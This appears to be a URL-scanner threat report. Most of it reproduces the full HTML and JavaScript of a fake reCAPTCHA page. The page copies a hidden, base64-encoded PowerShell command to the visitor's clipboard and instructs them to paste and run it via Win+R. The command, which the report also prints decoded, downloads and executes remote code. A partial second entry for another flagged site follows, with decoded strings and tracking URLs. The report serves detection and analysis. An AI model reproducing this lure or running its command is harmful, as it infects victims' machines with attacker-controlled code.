font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
https://www.bratusferramentas.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
{ "URL": "https://www.bratusferramentas.grupomoltz.com.br/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
https://ningbocrm.jintsume.net/
Total findings: 8
Indicators of Compromise
Suspicious Patterns
Malicious Code Sample
...' + 's?t=6809a40d&token=' + encodeURI(token), true); xhr.send(); }; ls(new XMLHttpRequest(), scriptPath, 'c8294e00fbb336010...
JSON Technical Data
{ "URL": "https://ningbocrm.jintsume.net/", "Base64Strings": [ { "Base64": "PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==", "Decoded": "<svg fill='#D7D7D7' style=\"float: right\" xmlns=\"http://www.w3.org/2000/svg\" height=\"24\" viewBox=\"0 0 24 24\" width=\"24\"><path d=\"M0 0h24v24H0z\" fill=\"none\"/><path d=\"M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z\"/></svg>" }, { "Base64": "CXtycX03MzYwYWU1Njk5NTk3MWFhMzJjYTZlMjc2YzVhYjllNTE0YTJiMzcwM2NmMDc0YTQwZDdlNTYyNDhjZmJmNzA4ODA2NWIwMjgwZjA2OTFmMGNiMTk0NzFhNjE5ZWUzMTMxYzUwZDI0Y2Q2ZDdhZTlmMzVkMjIyMjEzZGQ1MGE4MzJmZDYyMzRiZWUwYWY5ZTRiNmYwMTY2YjliMWVlN2JhMjYyODc5MmUyOGUxODNlM2U0MmU4M2MyOTA0MWRi", "Decoded": "\t{rq}7360ae56995971aa32ca6e276c5ab9e514a2b3703cf074a40d7e56248cfbf7088065b0280f0691f0cb19471a619ee3131c50d24cd6d7ae9f35d222213dd50a832fd6234bee0af9e4b6f0166b9b1ee7ba2628792e28e183e3e42e83c29041db" }, { "Base64": "MTc0NTQ2MjI4NS43NDIyOjhhZTQxM2Q2ZWM1YmI3ZWNlZmU5MWIyNTE5Yjk0Mjg3YzU5ODE5ZjE1NWU2ZTljYzNhY2NlOTEyOGRmZWU4YzI6NjgwOWE0MGRiNTMzNw==", "Decoded": "1745462285.7422:8ae413d6ec5bb7ecefe91b2519b94287c59819f155e6e9cc3acce9128dfee8c2:6809a40db5337" }, { "Base64": "eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2", "Decoded": "{\"alg\":\"A128KW\",\"enc\":\"A128CBC-HS256" }, { "Base64": "ZGU3NDM5ZGMxNmJhNzcwNjA5MDIzYWY3OTk3MWM2YzkxNzRkOTEzYSw2ODA5YTQwZGJiYTQx", "Decoded": "de7439dc16ba770609023af79971c6c9174d913a,6809a40dbba41" }, { "Base64": "eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2", "Decoded": "{\"alg\":\"A128KW\",\"enc\":\"A128CBC-HS256" }, { "Base64": "MTc0NTQ2MjI4NS43NDIyOjhhZTQxM2Q2ZWM1YmI3ZWNlZmU5MWIyNTE5Yjk0Mjg3YzU5ODE5ZjE1NWU2ZTljYzNhY2NlOTEyOGRmZWU4YzI6NjgwOWE0MGRiNTMz", "Decoded": 
"1745462285.7422:8ae413d6ec5bb7ecefe91b2519b94287c59819f155e6e9cc3acce9128dfee8c2:6809a40db533" }, { "Base64": "eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2", "Decoded": "{\"alg\":\"A128KW\",\"enc\":\"A128CBC-HS256" } ], "URLs": [ "http://www.w3.org/1999/xhtml", "https://www.networksolutions.com/promotions/ref/REPOINT-DPRD.html?dom=jintsume.net", "https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd*/!autoThread2?pzuiactionzzz=CXtycX03MzYwYWU1Njk5NTk3MWFhMzJjYTZlMjc2YzVhYjllNTE0YTJiMzcwM2NmMDc0YTQwZDdlNTYyNDhjZmJmNzA4ODA2NWIwMjgwZjA2OTFmMGNiMTk0NzFhNjE5ZWUzMTMxYzUwZDI0Y2Q2ZDdhZTlmMzVkMjIyMjEzZGQ1MGE4MzJmZDYyMzRiZWUwYWY5ZTRiNmYwMTY2YjliMWVlN2JhMjYyODc5MmUyOGUxODNlM2U0MmU4M2MyOTA0MWRiYzE%3D*", "https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf", "https://www.networksolutions.com/", "https://rnatrk.com", "http://jintsume.net/?ts=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0.LXfFrCS1WXsvZYhN0pMpIJ_IirxD6jMxm4iRtcbXhlbxcNvgUtH6zA.K0sHPEUgJE-mqbg3mcfFBQ.3AwWHekxWpV2DHMBJL_MFbEhcjRvJYzgUUhuHvb-_n11qhbCMHxfgEWcl5SxFUWPXxpXVgIF5HtWjzGBNA3GtEdoq7menOfMLbCMsjBG7oPplbdQg-amnvPSXdr6iOeIbadeJcxG6JvPYy-73oRFQmWjW7esejN4OemhpDfgb5faQOH0T7tbJSQ8h9nRgkCna6nHkTHUKeumr3RYaIariflHBLpmVLXO4k67ezgBIFw7UWsseKmEG4X0G9ifq_7L4WXx7ZceeS0GM85EacJCUEdnkNnjaemIqL3MU29R_Fb9ASoC2MFnwZXeFoUpS0_bde3nITt3lxS9y03zRREMJ50og23HVsXSAywEmQtqn0dEPDf6_rOcGlNeBdY5NmDv5e3bFzt1ERP2J61MMHq-HpmvTszMv6X2QG0AbfnXcPH6KLteB6E3BfWPVC831HOvvKjRFhixC8dVBD9R-5wcjg3iMDNZu1udqOxXvrcuDaRA6tJr5jKtZaOAhbNt4w9lmeFwshe-aYcTVizf7KQ9JZ6LQJdFnHl9Awj4aMcbutrS1JOQeMz_7Dk0EBqlwVWdn214D2RdjImPQnv5vaFvLMj7K3DV-gndhQn4VWwP871dNnLjt_K7qw2--ZTnytXp.PRCDxXuFw-uyPYsiW4SZEQ&skrghlp=sFZdIKBq2jpfWV3qpTGu53S%2B2%2FHTUXubDO0HgmfYnnAGbSoj8aMhwLW0OmiqLlQb", "https://rnatrk.com/munin/a/tr/click" ], "SuspiciousKeywords": [ "<script>", "display:none", "Array.prototype", "window.location.replace" ], "PowerShellDownloads": { "FullMatch": ".send()", "Context": "...' 
